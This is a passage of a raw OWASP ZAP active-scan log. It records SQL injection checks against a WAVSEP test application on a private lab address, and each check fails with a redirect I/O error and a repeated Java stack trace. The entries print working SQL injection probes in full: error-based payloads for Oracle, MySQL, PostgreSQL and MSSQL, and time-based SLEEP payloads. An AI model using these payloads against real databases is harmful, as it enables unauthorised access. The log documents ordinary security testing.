CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- QCwg at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682437 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 7010=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7010=7010) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (6189=6189] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 7010=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7010=7010) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (6189=6189 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682438 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 9269=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (9269=9269) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9269=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (9269=9269) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682439 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 2379=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2379=2379) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('BMlx'='BMlx] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 2379=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2379=2379) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('BMlx'='BMlx at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682439 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 1233=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1233=1233) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'XDgn'='XDgn] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1233=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1233=1233) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'XDgn'='XDgn at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682440 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 9239=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (9239=9239) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 9239=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (9239=9239) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682441 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 8616=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8616=8616) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- AVTM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8616=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8616=8616) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- AVTM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682442 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 9375 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9375=9375,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT 9375 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9375=9375,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682443 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(8570=8570,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(8570=8570,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682444 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7284=7284) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7284=7284) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682445 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3084=3084) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3084=3084) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682446 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);(SELECT * FROM (SELECT(SLEEP(5)))VMAh)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);(SELECT * FROM (SELECT(SLEEP(5)))VMAh)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682446 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;(SELECT * FROM (SELECT(SLEEP(5)))cQUA)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))cQUA)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at 